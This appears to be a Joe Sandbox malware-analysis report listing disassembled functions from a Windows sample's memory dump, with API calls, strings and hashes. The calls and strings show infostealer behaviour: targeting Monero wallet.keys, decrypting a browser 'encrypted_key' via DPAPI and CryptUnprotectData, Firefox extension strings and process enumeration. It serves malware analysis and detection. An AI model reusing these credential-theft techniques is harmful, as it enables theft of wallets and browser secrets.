Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: d55e7704ca5e82fef88d63c71b098d644ed90d2ba09cc5535a759d894b115c62
Instruction ID: 311aa4526bc234b0118b38da1a31bbce7681f09e40a8fea2ca4501afd793376d
Opcode Fuzzy Hash: d55e7704ca5e82fef88d63c71b098d644ed90d2ba09cc5535a759d894b115c62
Instruction Fuzzy Hash: 19013CB9A40209BFDB00DFE0DC59FAEB7B8EB48701F008159FA0597280DB74AA05DF91

Function 0036A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01148FA8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 0036A0BD
LoadLibraryA.KERNEL32(0114D6E0), ref: 0036A146

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A820: lstrlen.KERNEL32(00364F05,?,?,00364F05,00380DDE), ref: 0037A82B
Part of subcall function 0037A820: lstrcpy.KERNEL32(00380DDE,00000000), ref: 0037A885

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

SetEnvironmentVariableA.KERNEL32(01148FA8,00000000,00000000,?,003812D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00380AFE), ref: 0036A132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0036A0B2, 0036A0C6, 0036A0DC

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 1a678bf5c8d746b5354f8d8935aaa00f477e751e4a0fca75bdeee030524307f3
Instruction ID: 762558e857bc88e8891cac279f8c9dabea9439e0bc74e76a76af44b8043670a8
Opcode Fuzzy Hash: 1a678bf5c8d746b5354f8d8935aaa00f477e751e4a0fca75bdeee030524307f3
Instruction Fuzzy Hash: B841B5B1C01604AFCB06DFA4EC55AAE37B4FB6A301F188018F405A72A5EB34594CDF63

Function 0036A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 00378B60: GetSystemTime.KERNEL32(00380E1A,0114A480,003805AE,?,?,003613F9,?,0000001A,00380E1A,00000000,?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 00378B86

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0036A3FF
lstrlen.KERNEL32(00000000), ref: 0036A6BC

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

DeleteFileA.KERNEL32(00000000), ref: 0036A743

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 6cac32e6ed0a0cbc006ee25a43c1a7d399e923d19a3f69c3bc807d6c37d9373a
Instruction ID: 21cf1aaedead80706dd5b5c1c54eefcdb286a5c511ad6949df7b8f41692f4192
Opcode Fuzzy Hash: 6cac32e6ed0a0cbc006ee25a43c1a7d399e923d19a3f69c3bc807d6c37d9373a
Instruction Fuzzy Hash: FDE1D372810508AADB26FBA4DC91EEE773CAF54300F50C159F51A7A091EF386A4DDB62

Function 0036D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 00378B60: GetSystemTime.KERNEL32(00380E1A,0114A480,003805AE,?,?,003613F9,?,0000001A,00380E1A,00000000,?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 00378B86

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D801
lstrlen.KERNEL32(00000000), ref: 0036D99F
lstrlen.KERNEL32(00000000), ref: 0036D9B3
DeleteFileA.KERNEL32(00000000), ref: 0036DA32

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: cc7a78ee36f0fb80e83a7a645b5724f9bb4150b6d8518f663dac8320ad6795be
Instruction ID: aeb64f72522d2f13de46c8bbb3430019fc246aa6242e91405686b49a4dd4714e
Opcode Fuzzy Hash: cc7a78ee36f0fb80e83a7a645b5724f9bb4150b6d8518f663dac8320ad6795be
Instruction Fuzzy Hash: 3B811871910508ABCB16FBA4DC55DEE7738AF94300F508529F51B7A091EF386A09DB63

Function 0036F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

Part of subcall function 003699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003699EC
Part of subcall function 003699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00369A11
Part of subcall function 003699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00369A31
Part of subcall function 003699C0: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 00369A5A
Part of subcall function 003699C0: LocalFree.KERNEL32(0036148F), ref: 00369A90
Part of subcall function 003699C0: CloseHandle.KERNEL32(000000FF), ref: 00369A9A

Part of subcall function 00378E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378E52

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00381580,00380D92), ref: 0036F54C
lstrlen.KERNEL32(00000000), ref: 0036F56B

Strings

moz-extension+++, xrefs: 0036F5AD
^userContextId=4294967295, xrefs: 0036F59C

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 7918499d6076506c938538fde0eebadde4e9fe33264880653379d1cb4e607450
Instruction ID: c815cc223a780b42ceba6dab97b1b10edf63709fc4caddef246bd1a15b9bb61d
Opcode Fuzzy Hash: 7918499d6076506c938538fde0eebadde4e9fe33264880653379d1cb4e607450
Instruction Fuzzy Hash: 56513771D00608AADB15FBB4DC96DEE777CAF94300F40C528F51A6B195EF386609CBA2

Function 00369CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 003699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003699EC
Part of subcall function 003699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00369A11
Part of subcall function 003699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00369A31
Part of subcall function 003699C0: ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 00369A5A
Part of subcall function 003699C0: LocalFree.KERNEL32(0036148F), ref: 00369A90
Part of subcall function 003699C0: CloseHandle.KERNEL32(000000FF), ref: 00369A9A

Part of subcall function 00378E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00369D39

Part of subcall function 00369AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N6,00000000,00000000), ref: 00369AEF
Part of subcall function 00369AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00364EEE,00000000,?), ref: 00369B01
Part of subcall function 00369AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N6,00000000,00000000), ref: 00369B2A
Part of subcall function 00369AC0: LocalFree.KERNEL32(?,?,?,?,00364EEE,00000000,?), ref: 00369B3F

Part of subcall function 00369B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00369B84
Part of subcall function 00369B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00369BA3
Part of subcall function 00369B60: LocalFree.KERNEL32(?), ref: 00369BD3

Strings

"encrypted_key":", xrefs: 00369D30
, xrefs: 00369DC1
DPAPI, xrefs: 00369D89

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 0db3e3ef04c0b803fda16a4857935800244b757ed871dc04f620eae04dc03996
Instruction ID: d07f5dc3196df9fd0b3612a9aa8e964b608e6dd23715671da8ea4edf735dbc91
Opcode Fuzzy Hash: 0db3e3ef04c0b803fda16a4857935800244b757ed871dc04f620eae04dc03996
Instruction Fuzzy Hash: B33130B5D10209ABCF15DBE4DC85BEFB7BCAB48304F148529E905A7245E7349A05CBA1

Function 00378680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003805B7), ref: 003786CA
Process32First.KERNEL32(?,00000128), ref: 003786DE
Process32Next.KERNEL32(?,00000128), ref: 003786F3

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

CloseHandle.KERNEL32(?), ref: 00378761

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
